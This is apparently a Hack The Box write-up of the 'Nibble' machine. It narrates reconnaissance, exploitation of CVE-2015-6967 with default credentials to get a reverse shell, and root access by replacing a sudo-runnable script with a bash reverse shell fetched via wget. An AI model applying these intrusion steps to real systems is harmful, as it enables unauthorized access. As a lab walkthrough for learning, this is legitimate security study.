HTB: Nibble Writeup w/o Metasploit
Recon
Kicked off my fleet of nmap scans (nmap jutsu) that consist of a full, version, vulnerability, and a few quick scans. This revealed 2 open ports, port 80 and port 22.
Let us poke around the webpage first on port 80. After navigating to the site, we do not see anything useful from first glance. If you view the source code, you see a directory (/nibbleblog/) that was mentioned in the comments.
Enumeration
Before visiting the url, I am going to launch a gobuster scan against that directory (10.10.10.75/nibbleblog). I am also going to start a nikto scan just in case gobuster misses something. The scans against 10.10.10.75/nibbleblog show a bunch of other files and directories. We can go through them individually, but that could easily have me going through different rabbit holes. So before doing that, I checked my gobuster and nikto scans to see if anything stood out. The results were interesting.
The /nibbleblog/admin.php and /nibbleblog/install.php were especially useful. Admin.php was a login screen. The install.php led me to another page (updates.php) which had the web app’s (nibble) version number.
I used Google to look for exploits for this app and version number. CVE-2015–6967 was the exploit I used to get a shell. The exploit looks like it is uploading a file (our reverse shell) and executing it for us. It took me a while to find a payload that actually worked. Some of them I had to make compatible with python3. But this one here, I was able to use as is. It also provided the credentials to use the exploit.
I was curious though: “If this exploit didn’t provide the credentials, then how would I have found the credentials for the exploit to work?” I googled “nibble default credentials” and there were a few documentations and blogs that listed the one I used in the exploit and a few other passwords. Curiosity satisfied.
Privilege Escalation
Time to get root access. I run a few commands to get a better understanding of where (pwd) and who (whoami) I am on the box, and then I check to see if I can run sudo (sudo -l). The results of sudo -l show we can run /home/nibbler/personal/stuff/monitor.sh as root.
Since I can run this as root, I swapped out the file with something of my own. But first I and to unzip the file because monitor.sh is in a zipped file so I unzip it using (“unzip personal”). Then I created a reverse shell using the first bash tcp reverse shell here. Then I renamed it to “monitor.sh.” Afterwards, I spun up a webserver (python3 -m http.server 80) to host my “monitor.sh” file. I retrieved it from the compromised nibble box by running “wget http://10.10.10.75/monitor.sh” from the nibbler box.
All I had to do now was execute the script with sudo to get a shell with root access.
Conclusion
This was not a difficult box to get through. I think it would have taken a longer time if I went through all of those other directories I found under /nibbleblog/. The most difficult part for me here was finding the right exploit. The first few I tried did not work at all. I spent some time troubleshooting them until I started looking for others on github. Other than that, we were able to gain our initial foothold because the directory /nibbleblog/ was left in the source code.
Because of that we were able to find the version nibble was using resulting in the exploit we used to get our first shell. From there we found that the nibble user could run a monitor.sh script as sudo, swapped the file out with our reverse shell and caught a privileged shell.
Thanks for reading my writeup!
